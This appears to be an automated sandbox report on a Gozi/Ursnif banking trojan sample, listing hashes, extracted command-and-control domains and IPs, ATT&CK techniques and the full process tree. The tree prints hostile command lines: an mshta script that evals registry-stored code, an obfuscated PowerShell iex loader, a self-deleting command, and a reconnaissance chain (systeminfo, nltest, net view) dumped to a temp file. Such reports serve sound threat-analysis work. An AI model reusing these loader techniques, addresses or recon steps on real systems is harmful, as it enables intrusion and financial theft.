gozi | 112b84b09d2051376879f697f03190240132b87bbac0d069175bd3039d492f56

Resubmissions

25/12/2022, 16:04

221225-th4nmseg91 10

25/12/2022, 09:43

221225-lqbntsee3v 10

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25/12/2022, 16:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ursnif.exe
Size

332KB
MD5

a03b2c0e5af189c08c70a6532ab48300
SHA1

b4d68c7f0bc9a592f500de86e0125dd1e2a36089
SHA256

112b84b09d2051376879f697f03190240132b87bbac0d069175bd3039d492f56
SHA512

c77f652b8300763e9ebd5c93b85bfd5c8ef904c03f0ecc1fac9128fea211058980402ca511d71fa07d95fedb74abc8658a1bfc636f749c2022e64e96d427f3a7
SSDEEP

6144:4i7CLqelbeSO8XNHlreeOxeZ61hJFIJfVAVrwU+:jGGWbRNHlKel6PHgtyQ

Score

10^/10

gozi 3000 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

3000

trackingg-protectioon.cdn4.mozilla.net

185.189.151.38

31.214.157.31

protectioon.cdn4.mozilla.net

9185.212.47.59

194.76.224.95

194.76.227.159

91.241.93.111

Attributes

base_path
/fonts/
build
250249
exe_type
loader
extension
.bak
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

3000

protectioon.cdn4.mozilla.net

194.76.224.95

194.76.227.159

91.241.93.111

31.214.157.31

9185.212.47.59

trackingg-protectioon.cdn4.mozilla.net

185.189.151.38

Attributes

base_path
/fonts/
build
250249
exe_type
worker
extension
.bak
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1248 set thread context of 2712	1248	powershell.exe	63
PID 2712 set thread context of 3416	2712	Explorer.EXE	52
PID 2712 set thread context of 3688	2712	Explorer.EXE	58
PID 2712 set thread context of 3436	2712	Explorer.EXE	95
PID 3436 set thread context of 2512	3436	cmd.exe	98
PID 2712 set thread context of 4804	2712	Explorer.EXE	103

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2264	1144	WerFault.exe	78

Discovers systems in the same network 1 TTPs 3 IoCs

discovery

Remote System Discovery

T1018

pid	Process
4972	net.exe
4488	net.exe
4700	net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2528	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2348	systeminfo.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2512	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2512	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1144	ursnif.exe
1144	ursnif.exe
1248	powershell.exe
1248	powershell.exe
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
1248	powershell.exe
2712	Explorer.EXE
2712	Explorer.EXE
2712	Explorer.EXE
3436	cmd.exe
2712	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 52 IoCs

description	pid	Process
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeShutdownPrivilege	2712	Explorer.EXE
Token: SeCreatePagefilePrivilege	2712	Explorer.EXE
Token: SeShutdownPrivilege	2712	Explorer.EXE
Token: SeCreatePagefilePrivilege	2712	Explorer.EXE
Token: SeShutdownPrivilege	2712	Explorer.EXE
Token: SeCreatePagefilePrivilege	2712	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3948	WMIC.exe
Token: SeSecurityPrivilege	3948	WMIC.exe
Token: SeTakeOwnershipPrivilege	3948	WMIC.exe
Token: SeLoadDriverPrivilege	3948	WMIC.exe
Token: SeSystemProfilePrivilege	3948	WMIC.exe
Token: SeSystemtimePrivilege	3948	WMIC.exe
Token: SeProfSingleProcessPrivilege	3948	WMIC.exe
Token: SeIncBasePriorityPrivilege	3948	WMIC.exe
Token: SeCreatePagefilePrivilege	3948	WMIC.exe
Token: SeBackupPrivilege	3948	WMIC.exe
Token: SeRestorePrivilege	3948	WMIC.exe
Token: SeShutdownPrivilege	3948	WMIC.exe
Token: SeDebugPrivilege	3948	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3948	WMIC.exe
Token: SeRemoteShutdownPrivilege	3948	WMIC.exe
Token: SeUndockPrivilege	3948	WMIC.exe
Token: SeManageVolumePrivilege	3948	WMIC.exe
Token: 33	3948	WMIC.exe
Token: 34	3948	WMIC.exe
Token: 35	3948	WMIC.exe
Token: 36	3948	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3948	WMIC.exe
Token: SeSecurityPrivilege	3948	WMIC.exe
Token: SeTakeOwnershipPrivilege	3948	WMIC.exe
Token: SeLoadDriverPrivilege	3948	WMIC.exe
Token: SeSystemProfilePrivilege	3948	WMIC.exe
Token: SeSystemtimePrivilege	3948	WMIC.exe
Token: SeProfSingleProcessPrivilege	3948	WMIC.exe
Token: SeIncBasePriorityPrivilege	3948	WMIC.exe
Token: SeCreatePagefilePrivilege	3948	WMIC.exe
Token: SeBackupPrivilege	3948	WMIC.exe
Token: SeRestorePrivilege	3948	WMIC.exe
Token: SeShutdownPrivilege	3948	WMIC.exe
Token: SeDebugPrivilege	3948	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3948	WMIC.exe
Token: SeRemoteShutdownPrivilege	3948	WMIC.exe
Token: SeUndockPrivilege	3948	WMIC.exe
Token: SeManageVolumePrivilege	3948	WMIC.exe
Token: 33	3948	WMIC.exe
Token: 34	3948	WMIC.exe
Token: 35	3948	WMIC.exe
Token: 36	3948	WMIC.exe
Token: SeShutdownPrivilege	2712	Explorer.EXE
Token: SeCreatePagefilePrivilege	2712	Explorer.EXE
Token: SeDebugPrivilege	2528	tasklist.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2712	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 1248	2108	mshta.exe	89
PID 2108 wrote to memory of 1248	2108	mshta.exe	89
PID 1248 wrote to memory of 4340	1248	powershell.exe	91
PID 1248 wrote to memory of 4340	1248	powershell.exe	91
PID 4340 wrote to memory of 3008	4340	csc.exe	92
PID 4340 wrote to memory of 3008	4340	csc.exe	92
PID 1248 wrote to memory of 1996	1248	powershell.exe	93
PID 1248 wrote to memory of 1996	1248	powershell.exe	93
PID 1996 wrote to memory of 4788	1996	csc.exe	94
PID 1996 wrote to memory of 4788	1996	csc.exe	94
PID 1248 wrote to memory of 2712	1248	powershell.exe	63
PID 1248 wrote to memory of 2712	1248	powershell.exe	63
PID 1248 wrote to memory of 2712	1248	powershell.exe	63
PID 1248 wrote to memory of 2712	1248	powershell.exe	63
PID 2712 wrote to memory of 3416	2712	Explorer.EXE	52
PID 2712 wrote to memory of 3416	2712	Explorer.EXE	52
PID 2712 wrote to memory of 3436	2712	Explorer.EXE	95
PID 2712 wrote to memory of 3436	2712	Explorer.EXE	95
PID 2712 wrote to memory of 3436	2712	Explorer.EXE	95
PID 2712 wrote to memory of 3416	2712	Explorer.EXE	52
PID 2712 wrote to memory of 3416	2712	Explorer.EXE	52
PID 2712 wrote to memory of 3688	2712	Explorer.EXE	58
PID 2712 wrote to memory of 3688	2712	Explorer.EXE	58
PID 2712 wrote to memory of 3688	2712	Explorer.EXE	58
PID 2712 wrote to memory of 3688	2712	Explorer.EXE	58
PID 2712 wrote to memory of 3436	2712	Explorer.EXE	95
PID 2712 wrote to memory of 3436	2712	Explorer.EXE	95
PID 3436 wrote to memory of 2512	3436	cmd.exe	98
PID 3436 wrote to memory of 2512	3436	cmd.exe	98
PID 3436 wrote to memory of 2512	3436	cmd.exe	98
PID 3436 wrote to memory of 2512	3436	cmd.exe	98
PID 3436 wrote to memory of 2512	3436	cmd.exe	98
PID 2712 wrote to memory of 3612	2712	Explorer.EXE	101
PID 2712 wrote to memory of 3612	2712	Explorer.EXE	101
PID 2712 wrote to memory of 4804	2712	Explorer.EXE	103
PID 2712 wrote to memory of 4804	2712	Explorer.EXE	103
PID 2712 wrote to memory of 4804	2712	Explorer.EXE	103
PID 2712 wrote to memory of 4804	2712	Explorer.EXE	103
PID 3612 wrote to memory of 3948	3612	cmd.exe	105
PID 3612 wrote to memory of 3948	3612	cmd.exe	105
PID 3612 wrote to memory of 4756	3612	cmd.exe	106
PID 3612 wrote to memory of 4756	3612	cmd.exe	106
PID 2712 wrote to memory of 4804	2712	Explorer.EXE	103
PID 2712 wrote to memory of 4804	2712	Explorer.EXE	103
PID 2712 wrote to memory of 3108	2712	Explorer.EXE	107
PID 2712 wrote to memory of 3108	2712	Explorer.EXE	107
PID 2712 wrote to memory of 1528	2712	Explorer.EXE	109
PID 2712 wrote to memory of 1528	2712	Explorer.EXE	109
PID 1528 wrote to memory of 2348	1528	cmd.exe	111
PID 1528 wrote to memory of 2348	1528	cmd.exe	111
PID 2712 wrote to memory of 3972	2712	Explorer.EXE	113
PID 2712 wrote to memory of 3972	2712	Explorer.EXE	113
PID 2712 wrote to memory of 724	2712	Explorer.EXE	115
PID 2712 wrote to memory of 724	2712	Explorer.EXE	115
PID 724 wrote to memory of 4972	724	cmd.exe	117
PID 724 wrote to memory of 4972	724	cmd.exe	117
PID 2712 wrote to memory of 4920	2712	Explorer.EXE	118
PID 2712 wrote to memory of 4920	2712	Explorer.EXE	118
PID 2712 wrote to memory of 2532	2712	Explorer.EXE	120
PID 2712 wrote to memory of 2532	2712	Explorer.EXE	120
PID 2532 wrote to memory of 4776	2532	cmd.exe	122
PID 2532 wrote to memory of 4776	2532	cmd.exe	122
PID 2712 wrote to memory of 1476	2712	Explorer.EXE	123
PID 2712 wrote to memory of 1476	2712	Explorer.EXE	123

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3416

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3688

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Users\Admin\AppData\Local\Temp\ursnif.exe
  "C:\Users\Admin\AppData\Local\Temp\ursnif.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 564
    3⤵
    - Program crash
    PID:2264
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yhe0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yhe0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\16F27831-7D02-B8E1-B7AA-016CDB7EC560\\\ReturnStop'));if(!window.flag)close()</script>"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name mwufrj -value gp; new-alias -name itulkmq -value iex; itulkmq ([System.Text.Encoding]::ASCII.GetString((mwufrj "HKCU:Software\AppDataLow\Software\Microsoft\16F27831-7D02-B8E1-B7AA-016CDB7EC560").FileDesktop))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1248
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rsv205da\rsv205da.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4340
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5FF.tmp" "c:\Users\Admin\AppData\Local\Temp\rsv205da\CSCCD4A9EFF77C74B0886D79F3369619251.TMP"
        5⤵
        
        PID:3008
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5w1mv31y\5w1mv31y.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1996
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC786.tmp" "c:\Users\Admin\AppData\Local\Temp\5w1mv31y\CSC7FDF6AF712CA465C86D5F2A9DC411797.TMP"
        5⤵
        
        PID:4788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\ursnif.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3436
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2512
- C:\Windows\system32\cmd.exe
  cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get domain
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3948
- - C:\Windows\system32\more.com
    more
    3⤵
    PID:4756
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:4804
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:3108
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:2348
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:3972
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:724
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:4972
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:4920
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:4776
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:1476
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:4744
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2528
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:700
- C:\Windows\system32\cmd.exe
  cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:2216
- - C:\Windows\system32\driverquery.exe
    driverquery.exe
    3⤵
    PID:2320
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:4740
- C:\Windows\system32\cmd.exe
  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:2352
- - C:\Windows\system32\reg.exe
    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
    3⤵
    PID:3384
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:2408
- C:\Windows\system32\cmd.exe
  cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:1568
- - C:\Windows\system32\net.exe
    net config workstation
    3⤵
    PID:4980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 config workstation
      4⤵
      PID:4556
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:4232
- C:\Windows\system32\cmd.exe
  cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:4576
- - C:\Windows\system32\nltest.exe
    nltest /domain_trusts
    3⤵
    PID:4672
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:1084
- C:\Windows\system32\cmd.exe
  cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:3960
- - C:\Windows\system32\nltest.exe
    nltest /domain_trusts /all_trusts
    3⤵
    PID:1144
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:5020
- C:\Windows\system32\cmd.exe
  cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:980
- - C:\Windows\system32\net.exe
    net view /all /domain
    3⤵
    - Discovers systems in the same network
    PID:4488
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:3304
- C:\Windows\system32\cmd.exe
  cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"
  2⤵
  PID:3952
- - C:\Windows\system32\net.exe
    net view /all
    3⤵
    - Discovers systems in the same network
    PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1144 -ip 1144
1⤵
PID:4336

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5w1mv31y\5w1mv31y.dll

Filesize
3KB

MD5
1d3b7229d1d816aa41204b918f8963ac

SHA1
8d21d88488a200bf0427a4bba44db8860e6551b7

SHA256
fa3e2d5b41fa167af3bf8375e07e742c8a67a910a1ce99cfc6cdd19422830116

SHA512
cfadba7d21dc342e472f7156470b45ce130c739930bbcc74891769fde797eadb4494951fdd50862553682a582d40c59f50830a278cf96e919275d3ce4f89c20c

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
33B

MD5
1d0b80729108e13e765fa8b5dbc325b0

SHA1
155a3f53b166d45c70f4444c2603b6ceb95d4f9e

SHA256
4078dfa5ba175d50a27b6f7d1eb134da661cf559038b601986bc27beddb3a59b

SHA512
f3adc98b8a9288f80bf023cb691cf4d8e78fa7fa5e6e22eced1c6dcec9ea0e842fef609a06c92d2cd3d7c572e60aaaa4bb0a5821ab987b53f8ac68561b240b94

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
2KB

MD5
fd2dcd6b8f560dca6841ec655a2a325a

SHA1
ab33f4246507c32aaf2c79568302f8f953a11b2f

SHA256
40cb32d3044ceeefde4c0c4d000baca4011d7fda0d46f6e69fd72599b95e2369

SHA512
b055aab5a72052f3bf3d11362bde4ee5e5d4897ac655cd92680ddd794867e3647c0f0e46be8cde592d91e296782cb0d934cd7b3e477802bf26f968e6b231d6e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
2KB

MD5
fd2dcd6b8f560dca6841ec655a2a325a

SHA1
ab33f4246507c32aaf2c79568302f8f953a11b2f

SHA256
40cb32d3044ceeefde4c0c4d000baca4011d7fda0d46f6e69fd72599b95e2369

SHA512
b055aab5a72052f3bf3d11362bde4ee5e5d4897ac655cd92680ddd794867e3647c0f0e46be8cde592d91e296782cb0d934cd7b3e477802bf26f968e6b231d6e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
2KB

MD5
b99cad650041910dd6b85ed0296f7d6c

SHA1
ae0e537eab285fabb1f38d5f4de958db9e9969ca

SHA256
3d12838d22ff21d05ad2d6141af4de35089d4fec5ccf4eeed988093753980df3

SHA512
7852c0a806f800561193f4b8791878f434be2e1717e7979cde40e69405a507ce40b45108fdccc4055e664a060ecc44b8072017e17a9199b91e9b535942520f49

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
2KB

MD5
c8431849d3cd1e5b595cbda49e905072

SHA1
fdb7cc98208ce9d61411bc5887dc8076565cfefa

SHA256
3ec22ad608cbe0f9a4500d05f5d914a60ec0a9ae4c1d690ddc5ef8950d7ecdcd

SHA512
f01a2fc8829ae41fae6aab81f601a9c16792d8526ecde318501cc903fc42ecbfec4ab88affab1f2a24161f15d57f045520938fe2632fcce95b74b057cff31367

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
2KB

MD5
c8431849d3cd1e5b595cbda49e905072

SHA1
fdb7cc98208ce9d61411bc5887dc8076565cfefa

SHA256
3ec22ad608cbe0f9a4500d05f5d914a60ec0a9ae4c1d690ddc5ef8950d7ecdcd

SHA512
f01a2fc8829ae41fae6aab81f601a9c16792d8526ecde318501cc903fc42ecbfec4ab88affab1f2a24161f15d57f045520938fe2632fcce95b74b057cff31367

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
9KB

MD5
af6762007106b9fcc10ba55825daa01a

SHA1
b409550961bd67c473ca7ad0d2271e0e3ef992c9

SHA256
94bb97b63ce8de4fc9e502c40059d894cc51a3b9b8c67dc1c6e13c1c1099a5e3

SHA512
c25edb3348e6ae0be6cbc027beac8e7ab54bc24e4cb8dbde83023bbcd897a52b5e623a1db9b0652b10367718b51c375a0be2f3f3689df0b0694b2c2fab2bd73d

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
9KB

MD5
dd38e1d24fca3fc7aca07752a64fd1d9

SHA1
b93cb3bb36b69f7ded3757386e7db1ca03d60b5e

SHA256
2d41b7637a5055bddca9d9922469ebaffe2d227e72218ef6060fe9d16350223d

SHA512
6355b73da5fb5c391731111a076a4b9a73d31d4486c285efe6b76d9be689bbc0b368c992ea4a4af4e2deda5595f7a4479d80e7ccf08adb82e93192a805f1ae97

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
35KB

MD5
96d4e4b9c8418e3acb552e8e1a43301b

SHA1
8c843b4c18b0b6fc235ef0b98780ec6ec508ad29

SHA256
fdb3db5573ed05489753073918d0dc47d6d4cba828a93ad82cce7d7ee1990396

SHA512
dd343f0f278b7e89695b93f63524be2123ff4d80ed349725aa623a4e1806b059c77e4850c5b1696a1f4d1440cebd79305196f490de374e35abb320be38df7224

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
35KB

MD5
96d4e4b9c8418e3acb552e8e1a43301b

SHA1
8c843b4c18b0b6fc235ef0b98780ec6ec508ad29

SHA256
fdb3db5573ed05489753073918d0dc47d6d4cba828a93ad82cce7d7ee1990396

SHA512
dd343f0f278b7e89695b93f63524be2123ff4d80ed349725aa623a4e1806b059c77e4850c5b1696a1f4d1440cebd79305196f490de374e35abb320be38df7224

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
64KB

MD5
bef5f8946ba0b27fc2b4448c9ad0c953

SHA1
3555c0b4b547efeffeca60cf1d0de217a11d7102

SHA256
cab5a5051206e8e07b551731a185eb9823e0bcae5763b67005b6588fcc27e46d

SHA512
f18ce7a6679c9a138c0c2ed64b5855019a71a5593e5656403f984697d77e316b30b829f7c1bed74d78cd9da62c1bd4aae48eae1063ee2aa624ac45388a238ea8

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
64KB

MD5
bef5f8946ba0b27fc2b4448c9ad0c953

SHA1
3555c0b4b547efeffeca60cf1d0de217a11d7102

SHA256
cab5a5051206e8e07b551731a185eb9823e0bcae5763b67005b6588fcc27e46d

SHA512
f18ce7a6679c9a138c0c2ed64b5855019a71a5593e5656403f984697d77e316b30b829f7c1bed74d78cd9da62c1bd4aae48eae1063ee2aa624ac45388a238ea8

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
64KB

MD5
549f29f4765edd3eaa3b6e78dbfe473f

SHA1
2a30fa7a79db9606b709c9c5300645e953b4d548

SHA256
38cbc2d03a4e10446fd0222b2b96c43ce8d480bf63ea6ac48f08bf691706e085

SHA512
78371802d1cb6615e587ecfed09459dc65056f0f41fb1c67cbd099a4c614b3a8282c12507ad6710377251f4808debc8b4589190da886895b6719d538b2d0ee1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
64KB

MD5
549f29f4765edd3eaa3b6e78dbfe473f

SHA1
2a30fa7a79db9606b709c9c5300645e953b4d548

SHA256
38cbc2d03a4e10446fd0222b2b96c43ce8d480bf63ea6ac48f08bf691706e085

SHA512
78371802d1cb6615e587ecfed09459dc65056f0f41fb1c67cbd099a4c614b3a8282c12507ad6710377251f4808debc8b4589190da886895b6719d538b2d0ee1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
64KB

MD5
e5d63308709a076472fd1a357f8af240

SHA1
2ffe6177ffd738b4d2445491ef1601454ccfd105

SHA256
31db326714bc598879a7299098a497273c6e388693403c8412380a44966d0b52

SHA512
7dc44c1b9fdf1db1d11d5721d33fc0c1960a4b9f76c1b5ca64019eaedcedf61a01c0a60367a359c64fe78aadf1af50a5a962f6f98e7d0f61952efff652ecf31b

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B1.bin1

Filesize
64KB

MD5
2af8bcf3e92be8baa148b83f86338415

SHA1
2da0c75e6c1ff40068900915f2ff3a1181d7a1c9

SHA256
c578a45775b466fb1d7ff6efd8f47c91d1fbf01680fb2a2be1eb4e81ae8b77ea

SHA512
2f05752d0cdebc137294e4999e110e418db6ddc5b8c520d061d14d211695b16161fd78aa760fbd7e8bad9da5943fe307a47b3e03658efb3edb2f78b1515096e3

Download Submit
